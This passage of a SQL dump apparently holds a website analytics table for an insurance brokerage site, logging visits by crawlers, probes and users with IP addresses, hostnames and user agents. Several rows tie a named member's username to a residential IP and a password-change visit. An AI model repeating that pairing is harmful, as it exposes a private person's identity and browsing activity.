Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(23166,'0b_e38b143c2c7d83a895770ba66535a1b2','1462119615','195.154.199.235','electro.az-streamingserver.com','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(23168,'0b_58302eedd1ee843190e31db806043662','1462119998','91.121.112.142','mansfield3.didici.be','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(23171,'0b_58302eedd1ee843190e31db806043662','1462120000','91.121.112.142','mansfield3.didici.be','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(23174,'0b_58302eedd1ee843190e31db806043662','1462120009','91.121.112.142','mansfield3.didici.be','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(23175,'0b_3d359e38fada022af51bf6687e98f4b3','1462120949','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-status/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23178,'0b_b926ceeb92633795d4123aa532fb7732','1462123488','221.231.6.195','221.231.6.195','/templets/default/style/dedecms.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.empireins.com','',0,'','','cn','','','Spoofer bot','','','','0','0',0),(23181,'0b_b31cf50ebef466072170c11fe236eb04','1462124165','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23184,'0b_7bd1f4fe595d9c11d6dc0f72e893debc','1462125035','5.254.102.185','5.254.102.185','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(23187,'0b_cf58fa2fa6ac4fd6cd36eeb488915212','1462125048','65.19.167.131','65.19.167.131','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(23189,'0b_ec660873724baa7fee23f6853d6dd097','1462125749','144.76.7.107','mj2.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(23192,'0b_ec660873724baa7fee23f6853d6dd097','1462125752','144.76.7.107','mj2.naefmarco.ch','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(23193,'0b_00bba377483ddc7c7e1ef2fc18bee6e1','1462125749','37.139.50.150','37.139.50.150','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)','','',0,'WinXP','IE 6','','','','','','','','0','0',0),(23195,'0b_8c2a0ba3320bdbf0e7a494298ec6ac72','1462127629','100.43.81.152','spider-100-43-81-152.yandex.com','/top.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','tr','','','Yandex','','','','0','0',0),(23196,'0b_1097292d30f7b7c2860c3fafcadd0a42','1462130803','180.76.15.24','baiduspider-180-76-15-24.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(23198,'0b_600c3057603b1f63d1570577ed7c75d5','1462130962','180.76.15.154','baiduspider-180-76-15-154.crawl.baidu.com','/contact/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(23201,'0b_e67509b5cd576951c53b4e948e13a957','1462134129','67.86.154.190','ool-43569abe.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','3','0',0),(23202,'0b_e67509b5cd576951c53b4e948e13a957','1462134129','67.86.154.190','ool-43569abe.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1920 x 1080','Google','','','','','3','0',0),(23205,'0b_e67509b5cd576951c53b4e948e13a957','1462134133','67.86.154.190','ool-43569abe.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','3','0',0),(23208,'0b_e67509b5cd576951c53b4e948e13a957','1462134147','67.86.154.190','ool-43569abe.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','3','0',0),(23210,'0b_e67509b5cd576951c53b4e948e13a957','1462134167','67.86.154.190','ool-43569abe.dyn.optonline.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','3','51',0),(23213,'0b_e67509b5cd576951c53b4e948e13a957','1462134263','67.86.154.190','ool-43569abe.dyn.optonline.net','/?page_id=171','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','3','171',0),(23216,'0b_e67509b5cd576951c53b4e948e13a957','1462134265','67.86.154.190','ool-43569abe.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','3','51',0),(23219,'0b_bb442cd77540e6b9b002a9926f80c567','1462134277','98.20.0.119','h119.0.20.98.dynamic.ip.windstream.net','/','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','','','0','0',0),(23222,'0b_bb442cd77540e6b9b002a9926f80c567','1462134279','98.20.0.119','h119.0.20.98.dynamic.ip.windstream.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','','','0','0',0),(23225,'0b_bb442cd77540e6b9b002a9926f80c567','1462134303','98.20.0.119','h119.0.20.98.dynamic.ip.windstream.net','/','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','','','0','0',0),(23226,'0b_bb442cd77540e6b9b002a9926f80c567','1462134304','98.20.0.119','h119.0.20.98.dynamic.ip.windstream.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPad','Safari 9 Mobile','us','768 x 1024','','','','','','0','0',0),(23228,'0b_e67509b5cd576951c53b4e948e13a957','1462134368','67.86.154.190','ool-43569abe.dyn.optonline.net','/members/?a=pwdchange','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','lweinberger','','0','51',0),(23229,'0b_e67509b5cd576951c53b4e948e13a957','1462134381','67.86.154.190','ool-43569abe.dyn.optonline.net','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/members/?a=pwdchange','',0,'Win7','Chrome 49','us','1920 x 1080','','','','lweinberger','','0','51',0),(23231,'0b_e67509b5cd576951c53b4e948e13a957','1462134390','67.86.154.190','ool-43569abe.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/members/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','lweinberger','','0','51',0),(23232,'0b_e67509b5cd576951c53b4e948e13a957','1462134391','67.86.154.190','ool-43569abe.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','lweinberger','','0','0',0),(23235,'0b_e67509b5cd576951c53b4e948e13a957','1462134393','67.86.154.190','ool-43569abe.dyn.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','lweinberger','','0','51',0),(23238,'0b_e67509b5cd576951c53b4e948e13a957','1462134395','67.86.154.190','ool-43569abe.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/about-us/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','lweinberger','','0','51',0),(23241,'0b_e67509b5cd576951c53b4e948e13a957','1462134407','67.86.154.190','ool-43569abe.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','lweinberger','','0','51',0),(23243,'0b_1adca2487acd7b1284e240d35d6ca32b','1462134892','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23246,'0b_d94a4ea12ca955862470a8f31989f659','1462134892','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23247,'0b_1adca2487acd7b1284e240d35d6ca32b','1462134894','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23250,'0b_1adca2487acd7b1284e240d35d6ca32b','1462134895','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23253,'0b_1adca2487acd7b1284e240d35d6ca32b','1462134897','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23256,'0b_206b0016435f512eafab4df59ad20150','1462135946','45.33.59.157','li1009-157.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(23258,'0b_ceef13c3d47a5bf227d342fc9bd2a0fa','1462136406','180.76.15.32','baiduspider-180-76-15-32.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(23261,'0b_8d6504cd800317f077f3709222bef106','1462138056','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23264,'0b_8d6504cd800317f077f3709222bef106','1462138073','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23267,'0b_6ea7d8c7230dc671623c427bd451e256','1462139330','180.76.15.150','baiduspider-180-76-15-150.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(23270,'0b_680af3c6d9d332ff3e4f1892f979f42f','1462142555','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(23271,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145380','148.251.246.244','n19g1.007ac9.net','/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23273,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145380','148.251.246.244','n19g1.007ac9.net','/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23274,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145384','148.251.246.244','n19g1.007ac9.net','/robots.txt','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23276,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145385','148.251.246.244','n19g1.007ac9.net','/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23277,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145387','148.251.246.244','n19g1.007ac9.net','/agent-tools/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23280,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145389','148.251.246.244','n19g1.007ac9.net','/register/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23282,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145390','148.251.246.244','n19g1.007ac9.net','/about-us/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23283,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145391','148.251.246.244','n19g1.007ac9.net','/insentives/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23286,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145393','148.251.246.244','n19g1.007ac9.net','/licensing-contracting/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23288,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145394','148.251.246.244','n19g1.007ac9.net','/carriers/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23291,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145395','148.251.246.244','n19g1.007ac9.net','/contact/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23294,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145396','148.251.246.244','n19g1.007ac9.net','/case-status/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23297,'0b_f11c5cc51b6e54d1294ef7c165e86e1d','1462145398','148.251.246.244','n19g1.007ac9.net','/forms/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23300,'0b_952846bbfb602ffbedd801e33680aba4','1462145401','148.251.246.244','n19g1.007ac9.net','/igo/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23303,'0b_952846bbfb602ffbedd801e33680aba4','1462145402','148.251.246.244','n19g1.007ac9.net','/term-quotes/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23306,'0b_952846bbfb602ffbedd801e33680aba4','1462145404','148.251.246.244','n19g1.007ac9.net','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23309,'0b_952846bbfb602ffbedd801e33680aba4','1462145405','148.251.246.244','n19g1.007ac9.net','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23312,'0b_952846bbfb602ffbedd801e33680aba4','1462145406','148.251.246.244','n19g1.007ac9.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23313,'0b_952846bbfb602ffbedd801e33680aba4','1462145407','148.251.246.244','n19g1.007ac9.net','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23315,'0b_952846bbfb602ffbedd801e33680aba4','1462145408','148.251.246.244','n19g1.007ac9.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23318,'0b_952846bbfb602ffbedd801e33680aba4','1462145409','148.251.246.244','n19g1.007ac9.net','/?page_id=169','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23319,'0b_952846bbfb602ffbedd801e33680aba4','1462145410','148.251.246.244','n19g1.007ac9.net','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23322,'0b_952846bbfb602ffbedd801e33680aba4','1462145411','148.251.246.244','n19g1.007ac9.net','/members/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23325,'0b_952846bbfb602ffbedd801e33680aba4','1462145412','148.251.246.244','n19g1.007ac9.net','/meet-the-eib-team/','Mozilla/5.0 (compatible; 007ac9 Crawler; http://crawler.007ac9.net/)','','',0,'','','','','','Unknown Spider','','','','3','0',0),(23327,'0b_3bc69c7bb08924b08bcc432c967f7644','1462145589','98.20.0.119','h119.0.20.98.dynamic.ip.windstream.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPad','Safari 9 Mobile','us','','','','','','','0','0',0),(23330,'0b_6c02c479eab630e1d5f1bf9da395ce52','1462145811','66.249.64.160','crawl-66-249-64-160.googlebot.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(23331,'0b_6c02c479eab630e1d5f1bf9da395ce52','1462145824','66.249.64.160','crawl-66-249-64-160.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(23333,'0b_b0fe806c8df116db533eb41c9a112393','1462147035','157.56.3.66','msnbot-157-56-3-66.search.msn.com','/robots.txt','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 (BingLocalSearch)','','',0,'Win8','Google Chrome','','','','BingBot','','','','0','0',0),(23334,'0b_b0fe806c8df116db533eb41c9a112393','1462147036','157.56.3.66','msnbot-157-56-3-66.search.msn.com','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 (BingLocalSearch)','','',0,'Win8','Google Chrome','','','','BingBot','','','','0','0',0),(23336,'0b_c64d21946dc691f8c25adcb17dc79456','1462148034','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(23337,'0b_c64d21946dc691f8c25adcb17dc79456','1462148066','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(23340,'0b_3099d75e68cbf94729d16d474cb26b88','1462150000','5.9.151.22','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(23342,'0b_3099d75e68cbf94729d16d474cb26b88','1462150003','5.9.151.22','majestic12.co.uk','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(23343,'0b_3099d75e68cbf94729d16d474cb26b88','1462150005','5.9.151.22','majestic12.co.uk','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(23346,'0b_3099d75e68cbf94729d16d474cb26b88','1462150008','5.9.151.22','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','3','0',0),(23348,'0b_52b754dbe7cdd70dc616fdb777e74258','1462152209','66.249.64.160','crawl-66-249-64-160.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(23351,'0b_3b85fb13eba816d36b5416c9d4253e2b','1462154787','31.3.233.115','h31-3-233-115.host.redstation.co.uk','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','','',0,'Linux','Chrome 35','gb','','','','','','','0','0',0),(23354,'0b_3b85fb13eba816d36b5416c9d4253e2b','1462154789','31.3.233.115','h31-3-233-115.host.redstation.co.uk','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','http://www.empireins.com/','',0,'Linux','Chrome 35','gb','','','','','','','0','0',0),(23355,'0b_d37b78f783aa5f2a3c644c47c685ecae','1462157548','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23358,'0b_d37b78f783aa5f2a3c644c47c685ecae','1462157552','207.46.13.129','msnbot-207-46-13-129.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23361,'0b_3301770d4e3c73bb2103c2b9a06171c7','1462158113','68.180.229.38','b110166.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(23364,'0b_3301770d4e3c73bb2103c2b9a06171c7','1462158114','68.180.229.38','b110166.yse.yahoo.net','/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(23367,'0b_793179b824e0041c3939b03169208c18','1462158127','68.180.230.123','b115363.yse.yahoo.net','/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(23370,'0b_d5e79b8f939f4bc357cbe3240463ac10','1462158222','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23372,'0b_fb2543328e26849fe3aaa11c0c1dc7f7','1462161126','203.12.164.34','203-12-164-34.static.tpgi.com.au','/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','https://www.bing.com/','_notprovided_',1,'Win10','Google Chrome','au','','www.bing.com/','','','','','0','0',0),(23373,'0b_fb2543328e26849fe3aaa11c0c1dc7f7','1462161132','203.12.164.34','203-12-164-34.static.tpgi.com.au','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586','http://www.empireins.com/','',0,'Win10','Google Chrome','au','','','','','','','0','0',0),(23375,'0b_a594ef54249aa673e0f9970916133e42','1462162073','104.236.52.23','104.236.52.23','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7 x64','Firefox 21','','','','','','','','0','0',0),(23376,'0b_a594ef54249aa673e0f9970916133e42','1462162073','104.236.52.23','104.236.52.23','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7 x64','Firefox 21','','','','','','','','0','0',0),(23379,'0b_8365221ffe5275c9358d612e393ef87f','1462164161','208.115.111.66','208-115-111-66-reverse.wowrack.com','/igo/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23381,'0b_cd196cac6d91c25125ec4a31ae0619fc','1462164972','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Opera/9.00 (Windows NT 4.0; U; en)','http://moneytop.ru/','',0,'WinNT 4.0','Opera 9','us','','','','','','','0','0',0),(23382,'0b_cd196cac6d91c25125ec4a31ae0619fc','1462164972','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Opera/9.00 (Windows NT 4.0; U; en)','http://woman-h.ru/','',0,'WinNT 4.0','Opera 9','us','','','','','','','0','0',0),(23385,'0b_25e09ce6f3611ed5c5a471196f1ca0a4','1462167688','66.249.64.251','crawl-66-249-64-251.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; 